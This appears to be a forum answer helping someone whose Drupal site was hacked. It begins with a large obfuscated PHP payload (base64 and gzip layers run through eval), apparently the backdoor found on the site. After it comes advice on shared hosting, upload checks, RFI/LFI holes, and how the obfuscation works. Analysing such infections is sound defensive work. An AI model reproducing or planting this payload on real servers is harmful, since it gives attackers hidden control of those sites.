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'))); ?><?php eval(gzuncompress(base64_decode('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'))); ?>
First of all, you need to know two things:
This may not be your fault. If its a shared host, the hacker may have compromised any of the other thousand websites on the host, rooted the server, and then attacked your site from within.
Having said that, it may be your fault, so don't relax. Still look for holes.
But, besides looking at the logs, look for vulnerabilities within the sites. Does the site accept user-submitted content? If so, are there file uploads. If so, do you check the file for MIME-Type or just extension.
Another thing is RFI and LFI hacks. These vulnerabilities allow hackers to inject shells into your site, effectively making them administrators with complete file access. Look for these vulnerabilities.
If you can post the code in the .txt files, I'd be happy to "decipher" it for you.
If I can think of anything else, I'll addon.
Edit 1
So, essentially the hacker used base64 and gzcompress to "obfuscate" the code. He then executes the uncompressed code with the eval() function. So, essentially, you can see the first layer of code by removing the eval() function and running the code. Unfortunately, under the first layer, there's another layer which I'm looking at.
In addition, since you say Drupal.... you may be using addons or plugins. Drupal may be secure, but those addons or plugins may not be. Do any of them handle form uploads or files in any way?
Edit 2
First Layer (Submitted by OP).
Second Layer (Initial gzuncompress and base64_decode()).
Still working on it...